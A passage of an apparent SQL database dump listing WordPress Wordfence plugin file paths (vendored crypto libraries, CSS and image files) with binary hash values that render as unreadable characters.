s','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EӤ㭇Mg','Q*\'B+Eߞ:myuW','',0,'?'),('kPP1<','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oul_4@','6b% \"ʴsJp38ӷSǙ:','',0,'?'),('MAH\0[d_!','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5,}vĨ3G)','Er4@\0ԡ$z3$l\Z`iexl','',0,'?'),('8YvC[,','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\0>}LQ\0','_U\0]q=Չf\\/	@d\r+v*(','',0,'?'),('Zp%\'n\ZWj','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ț)W0\nM',';3Ub}V k\'Yr\nrH)6','',0,'?'),('PK2I)','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[hkda4p','&!7^@9NBT*8','',0,'?'),('&PDt?5u1Ym','wp-content/plugins/wordfence/crypto/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' =I,','AQTcqPBbt\0','',0,'?'),('N\'!\rBj3','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H!#>bW','&xwαh)œ@5m.)9R','',0,'?'),('F|wZQ,O','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6?\n	:{Q%','ZIK/Iw¥OvyEBi\\$G&','',0,'?'),('O4ǳWQ\0R','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>ǈ\"Cix','x眪!}\ZWd','',0,'?'),('.U	Y=','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h`VAf','<\\G;1#kLà(փ','',0,'?'),('>GOjPlB','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$]\\','ؚx\"o*I\nQjT(G\Z.\Z','',0,'?'),('1-g97','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#fG\rւBg 0','c(k12Qw4?0','',0,'?'),('461mYR','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nH\0u} `','R&Xd[49VI','',0,'?'),('\rX+-Ta','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' O>A+=\Z,','UsDMÙd(\0ā~','',0,'?'),(' vbu)','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Y@_x','ް\Z^3ɟvU.a\r]fhI(sA','',0,'?'),('PJt1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!EP]ǡ;','<\0\rIB=\"P8D\"L~I[','',0,'?'),('wË9/,+1','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g۰/*C,k#','avxu흶j=ISD{!','',0,'?'),('YV29}D8','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CZ?@JN_ji<\Z','<H\"F@%1`7<	}','',0,'?'),('PIcDƾ','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JsǙB','ERJbȸI\"t],qP1\\fD','',0,'?'),('IooԆ5nuѭH','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KAct&',';8%&h1RnJ g0-p\"F1*ts','',0,'?'),('??Q$P.:X6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|K-	','3\\3L\r?B8X\ZN8wCNU=M','',0,'?'),('ƄNB׭','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~dNc@G#,','.\"K|[\0:H/?','',0,'?'),('^&`RyJ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y}Jk>','/O	¹kbz_B]U','',0,'?'),('-췓9ExZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-glrc]\0','AB-q=3zfRrWM4V)','',0,'?'),('yKv.\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5@?U','Ʊ#q(Ysq)}','',0,'?'),('?HhD0	','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^R[XITe)','u9 :YnU:syg50=	CW5$eA=','',0,'?'),('\n:X2Lnc','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q(P7APؐdh','N~!)Nc~\\n.lFv','',0,'?'),('Z(|Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QUp~ocÊ4Nt','Lnl2@ΐ>hi,uJYH\\L,B','',0,'?'),('ν}V+tB','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','꤀x٠%cl','N8,caeΟi<5p$','',0,'?'),('!Id]5$[~','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oL k\'k1','1\\Qt*J%s&','',0,'?'),('\'|?>','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LaDJ?Z','=F==<_%=M?u/','',0,'?'),('IPEXtFH%','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Lv[c)?','Ch!݀F$}wd7b(!pIF.L','',0,'?'),('W= \\\'x\"W}d','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','թK^㥾','M8:naƋGZqQdý!\'&g1','',0,'?'),('ZяݒS','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l\Z^ZHG%O','mc;\ny㐲0,5F|=C','',0,'?'),(',zeY#uJ~[P\r','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' OpR{ҵGݍ','Y:BP5Ms_.ن֎','',0,'?'),('BKAa<l2','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XߓŒ\"X36DQ','!l..GI\n7oeѿ\';I\n\n','',0,'?'),('\\\Ze	)Up','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȑH\Zb>VDR2','rћJԑI/\nOY}xņU ','',0,'?'),('bq/Fk','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7¤\rFg','nV\'VV)F|*ᑝ2Nz','',0,'?'),('^Sx_?uGD','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hd9<Cˤbl','K.Boࣸvb%S~1K','',0,'?'),('N=f>$KHT','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?G{g','ĀР<W;-\Z񀍙(C+,MUW6','',0,'?'),('/؊!N>\n','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f<_2S^IZ','iݯ8{iq!dՍAz','',0,'?'),('YBWy	+BOmz','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#:N\'DxN','[_|А~E+~E(`_','',0,'?'),('KLx<CHe\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ENĂۛ(\nn','Ѭ}^EF>ڂB','',0,'?'),('F1+\Z#+d{w{','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.D6pir`fw=','2KJ73x2M2&+LL','',0,'?'),('ESc+#)','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uNmSC{','P~{p}x{82hXx','',0,'?'),('!Plu6CZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pe1','T*+z]ʜ;>\n3]?x','',0,'?'),('ia{-\Zؙo','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}<܎s9','Q\'r t7=s*a`<zo_','',0,'?'),('\"8Y74O<','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','diBDJD5O','NaiB\rAO]@P','',0,'?'),('jֹJ0Y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p0W\"F)8O','5)&BoK]ػrm`%hO','',0,'?'),('	\")\"0Io','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zq\Zsq776','CDa$=f[Q4JW7l).=%','',0,'?'),('ZLOl','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CFhz','oő\nwnpL+;~t2P*ƃ6','',0,'?'),('d`#)?ϳ0(w','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' oY-)EHd','l,8ETCeylaS;)\'\"d`z','',0,'?'),('G<7et/W','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[f0Lş\r{VW','\'&ܔ[m`ϊc2E%WGW䉷','',0,'?'),('th	,Gx\"M','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZP}>j ','Mya;>p:/f','',0,'?'),(' GʴGtؑ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lkm>[?','c+ZY:{\nJPc\"{4u#','',0,'?'),('qL>#Q\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BgY',':IZCZ8ȰL]m','',0,'?'),('xLKx 2Is!#Q','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rUCB\"',')M쩂tUδԪF.','',0,'?'),('%#t4x','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yW0{XnZ0','\0AVRXȕ~d^/)@R','',0,'?'),('P NtD݌n\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a!,^q','X߇pՔZЉֱo\r=˸<!~3','',0,'?'),('$P`\0gX','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF\\2','2ks\\>RI:nHȿDm!zz','',0,'?'),('Z9}.Jk=','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I\Z\nӣ','i>zR@kW6uky','',0,'?'),('Pbw=i','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\ZIw5AlLۢ','K{8fl7sRh嗋I','',0,'?'),('-\'gP\\','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9V#ҹ4','GpfHv\Zx81C[4A','',0,'?'),('AK<jgsr','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Kb(\\pB-','ճ* ʰ	[q˜Pk','',0,'?'),(' ލ<:9|6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-_b->O\\苃','sɔg%riCPw%{J','',0,'?'),('vLM.f%OMR','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4V+=?k\r','_x:nOsO:d\'\0N=k','',0,'?'),('͍ρbB','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I%0\\L-','bhppv״O#u 5/=9ň)','',0,'?'),('oC\"Qty','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+%','4!H:6>lEEc#a{A{','',0,'?'),('*b*ee','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x\\8zM~.','vR\0S~[\rҮ6o:Ś\r]','',0,'?'),('HY6oD{LH','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zl쇌1gE',';}-\Z	Ud)sD%R','',0,'?'),('➞^՘R','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ohg[','߁.-h4`9S _\r)I(W','',0,'?'),('%$MqT<','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CUO\ZߠxtH','G\n\"_/Agh	U?SsHבYٳ','',0,'?'),('̙~Ȍî+byȁ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{숊z;5!','D\ZLޠΔa]n\nL&\n','',0,'?'),('K0\rܐcn','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÅKW<S\Z|r_','E`w`>.2V\"\0Mp\r 9','',0,'?'),('?U\'_l.p','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o>B	IN-y','hl[(l~QuFM	','',0,'?'),('gxAȢ}g','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zIjcYKC\0','PRV*Īi}kVX','',0,'?'),(']*.>`Ef','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kFh瀁1-','6!omݎ^.^@˨v7	I}','',0,'?'),('l/<UZA','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͣrZw','#J<L6zqN0f8Z','',0,'?'),('-\\[Jץ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F1	M]','A8{!Vt<SqHoh4y`By','',0,'?'),('of?3P1\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"̤/OY\'','8eTet\r jP/J<^rӥz','',0,'?'),('71}\n','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','12+;FнNM','w\"*5U T@nyȳ^au\'','',0,'?'),('wy*XO\nG','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NVl~m[%Wt','Pq\0V{|0m\0;2f@U','',0,'?'),('W8h!ɩkĉ\'','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rRUb*\0\'','x<sBZ2jRM\'0%$i{ V','',0,'?'),('ͥ`FJSu','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kz+UŸ(5\\','8:oI9,=zDk8;{A{\Zij','',0,'?'),('Ia\n؎a','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\Z\Z+,','*y$MQ[q:h\")XTC\0\\k','',0,'?'),('cYF}j`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3b(浏К','n;<	Ǖ-Wt]<su','',0,'?'),('u_~!\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y=\nY992','6\Z/py5EحOE','',0,'?'),('o	lѴcd','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n@LjwD','\r8d8sڇ6FȌ','',0,'?'),('~+qX\"`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oaQ|g4&','cUX+]Wvd=,Z0)\\','',0,'?'),('h]CA*','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZbO6IcD','`ude?s7dCQ}Y/','',0,'?'),('_npaV','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>*L1˵\"k%F+','ZiMfUvi-})f\"Mnd?X','',0,'?'),('Xp~0D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Woe~oB2_;','5qSrL]OXsq+l<ɒ','',0,'?'),('A?]\\8PMTl','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CB)cae','[}D\0OV:~-\"~mBh\"<pW','',0,'?'),('BPXW6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' QAL󚜆U','G\n<.\ZWrʪØ)','',0,'?'),('[\'/;','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D2E\\t.-','U\n/miMyE-QM^\0QL9hT','',0,'?'),('a@WrQwZ\n.','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܑzg<N\n?o6f','REgX3JAc!a_S{','',0,'?'),(' K iDt','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zz#H','n]x\Z_ѪkB-a&̃','',0,'?'),('_#U1pGS','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zrtw(e','ҿDI<^i2dW]G_-+A8W','',0,'?'),('?FϸAR1','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pԏd0lN&7+','^s\n@G,ږ\n;|3P	nԔ/\rzA\"\nd','',0,'?'),('/	E:KR寥v','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Vή?b4','=ޣ4:$dXWRXN >','',0,'?'),('z9	`d3\0Iay','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' @^8J','ؽ@B-Km-Ȼ\Z2p','',0,'?'),('B@R*GxF4N}','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'_?Sş\Z]y','6[-,9YRr\rY\"-an6$','',0,'?'),('GGa\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÕmANR',' *J/(sg YD]و̨|\0z','',0,'?'),('aJr&-D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b]݆щpW','ド$⨇\r׶oޖGǗq#7','',0,'?'),('XX*!2~','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƌ@N`Xg','Q&3Ɓ_+i	uqI+:	IO','',0,'?'),('TL ߈,]զm','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8	:{We','6{w^GkΫ25b\r񓫄','',0,'?'),('󎋹NMlRl^5~','wp-content/plugins/wordfence/css/activity-report-widget.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J^x;yc','ӡfaMWv+W%}`DN','',0,'?'),('l7','wp-content/plugins/wordfence/css/diff.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܀g		$`rQ','$hEJ^54<$ӭYc&','',0,'?'),('DxCD̺r','wp-content/plugins/wordfence/css/dt_table.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gJbjJ9k:','o[PHyЊ}iGc~<cDR:D','',0,'?'),('OZ;7F:eH','wp-content/plugins/wordfence/css/fullLog.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e.i`΁Uv','?>?hξ[²Pu{puaa','',0,'?'),('hr\Z;%e-x','wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GJu;QZ6','\\MUKhQwCiVJ\'','',0,'?'),('2v\'9\rz','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pbD@pG+','*DZ>Bg&YY4(</','',0,'?'),('\Z R[\'>','wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\\c7yxгl','~qV*\'1]3^m','',0,'?'),('2r}Vĥ$^n/','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h^n=(&݂N&','SDIBz_-?(YpEyƹA','',0,'?'),('\\7Qo','wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|%;wQ8@','wi>6Ƭ4.NC\Z4IO','',0,'?'),('vO#JN+쁁','wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$2J','/#?TiOLyvuTKɤ\\ػ','',0,'?'),('f!@gT9','wp-content/plugins/wordfence/css/iptraf.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ebf.\nV[xPh','J-@ ]-	cqWQ